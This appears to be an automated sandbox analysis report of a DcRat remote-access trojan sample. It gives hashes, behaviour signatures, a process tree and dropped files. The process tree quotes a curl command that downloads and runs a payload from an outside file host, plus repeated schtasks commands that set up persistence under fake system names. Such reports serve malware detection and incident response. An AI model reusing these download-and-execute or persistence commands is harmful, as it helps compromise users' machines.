Analysis

  • max time kernel
    117s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-11-2024 06:34

General

  • Target

    3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe

  • Size

    1.2MB

  • MD5

    e5a4be0eb47c462ad72240167b00d6eb

  • SHA1

    09793e20889984c4d8f18385052baa82202afca8

  • SHA256

    3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15

  • SHA512

    6c2445109f25acb7d8fb545b66db590ba2c4bcc0237829ce99f7bf0c4f135e37b1b5b4afba2477b807bf36c529d679479265fec7657f89faf052cf532a2e2bd1

  • SSDEEP

    12288:F0GtwVUTytoIn41c6iHKnkUxCj2AqeMQmwWe0ZQyRWkhuq3nbep3+bKDZhW/lc4q:ptDZcpHKnkuGKFplpC+bKlAtc06z

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe
    "C:\Users\Admin\AppData\Local\Temp\3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1656
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
        PID:3064
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3536
        • C:\Windows\system32\curl.exe
          curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe
          3⤵
          • Drops file in Windows directory
          PID:1132
      • C:\Windows\Speech\physmeme.exe
        "C:\Windows\Speech\physmeme.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:3528
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Medal\LziQ5Qlyzu0f0C5NtfHJq0w.vbe"
          3⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5028
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Medal\Fua65ZRdZNJ5OJAqSXb7513NtPonCq4dK3Ubpg1B.bat" "
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:700
            • C:\Medal\Medal.exe
              "C:\Medal/Medal.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2164
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XZYvCKrY72.bat"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:3936
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  7⤵
                    PID:2336
                  • C:\Windows\system32\PING.EXE
                    ping -n 10 localhost
                    7⤵
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:2576
                  • C:\Medal\taskhostw.exe
                    "C:\Medal\taskhostw.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4584
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4176
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2320
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4432
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Medal\TextInputHost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4892
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Medal\TextInputHost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:404
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 14 /tr "'C:\Medal\TextInputHost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4116
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\upfc.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2112
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\upfc.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2736
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\upfc.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4736
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\sihost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4692
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\sihost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2024
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\sihost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2696
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Medal\taskhostw.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4268
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Medal\taskhostw.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2460
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Medal\taskhostw.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2196
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 9 /tr "'C:\Medal\Medal.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1912
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "Medal" /sc ONLOGON /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4440
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 14 /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:5112

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Medal\Fua65ZRdZNJ5OJAqSXb7513NtPonCq4dK3Ubpg1B.bat

        Filesize

        63B

        MD5

        e24619181276af563705f4b1bed29490

        SHA1

        fddac27290319f69543f5330fe97c122a8a01376

        SHA256

        eee937e02edcd36de3ed7658c9ad9d79844502c8553a7c244b2b154aa9ffec05

        SHA512

        1898a5e2a52f2f34466dfd9e1b1149b36052874b6be432dd9301ecfa6bc3a964dca6980b8db54ddcf8ef24a95792efcaffeb09aceb7a04304a0d18f4d0ce0591

      • C:\Medal\LziQ5Qlyzu0f0C5NtfHJq0w.vbe

        Filesize

        224B

        MD5

        96d43070e1e39d421c53a2f8dca13fc6

        SHA1

        07417cccceddbf8d5f5b48dec0b2e08d53a4754f

        SHA256

        0dab986e5c533631946e27cdbb5147e68b9eb3008c1add60d21a59cd7d964314

        SHA512

        9fc0ee5ac42bca7c7ee7584baa5be6907fc750378d037d56e075a21c4fe8eaeb3efac3e9fb6087a70a6ad01dcebf05d2462f2463daa8063b4047c11e5364d398

      • C:\Medal\Medal.exe

        Filesize

        1.8MB

        MD5

        4f66bbfed3a524398bd0267ed974ccbc

        SHA1

        b2567397dc823412d87a23428c7833ff74586b7d

        SHA256

        fa05b7f28eb1df0447998b89a08aa96453b0f3240c31489900d178862eaa80d8

        SHA512

        bc4de61adb5f56c66043a2617ebfcc9f4e82d36e48dbdc9178695f9466d554eb364d69829490ff43100e8cb457ce7e78b2e277a3cf1733edf32c0154e6f56d9f

      • C:\Users\Admin\AppData\Local\Temp\XZYvCKrY72.bat

        Filesize

        150B

        MD5

        ee929420b28005761cc1696b37719a0d

        SHA1

        63632462e7022d1fefb42bb38a12fc0959e575df

        SHA256

        bfa883b5b86e00b1390bccd50fed260ca7f90843b6a29832ef403ba8ed283a74

        SHA512

        aac80ab797432debec236fdc4eb28b35b93f741ec8849904268f8021356e8fb126f313bceb5b8ab1fd11f54c861b93476b793f825d0b3df0ea2819e2813b564b

      • C:\Windows\Speech\physmeme.exe

        Filesize

        2.1MB

        MD5

        f4620c0afa8e21897509b2e7215097f5

        SHA1

        af216ca6105e271a3fb45a23c10ee7cf3158b7e1

        SHA256

        8daf7dcdf256d7de40d33e5550dc5e8bbf887b8c4b7f49c79a15c96dad867f82

        SHA512

        68b875acc06d9c3796f49377b5b25a5e8b9a380221eea59e4274249ca7d2bff10c3fc5edf50eae5da726afea882e0e777af86af25be7b57c8fbfd70448d8d7dd

      • memory/2164-19-0x000000001BC50000-0x000000001BC6C000-memory.dmp

        Filesize

        112KB

      • memory/2164-17-0x0000000003230000-0x000000000323E000-memory.dmp

        Filesize

        56KB

      • memory/2164-20-0x000000001C050000-0x000000001C0A0000-memory.dmp

        Filesize

        320KB

      • memory/2164-22-0x000000001C000000-0x000000001C018000-memory.dmp

        Filesize

        96KB

      • memory/2164-24-0x000000001BC20000-0x000000001BC2E000-memory.dmp

        Filesize

        56KB

      • memory/2164-41-0x000000001C1A0000-0x000000001C26D000-memory.dmp

        Filesize

        820KB

      • memory/2164-15-0x0000000000ED0000-0x00000000010AE000-memory.dmp

        Filesize

        1.9MB

      • memory/4584-50-0x0000000002B50000-0x0000000002B58000-memory.dmp

        Filesize

        32KB

      • memory/4584-51-0x000000001D5C0000-0x000000001D68D000-memory.dmp

        Filesize

        820KB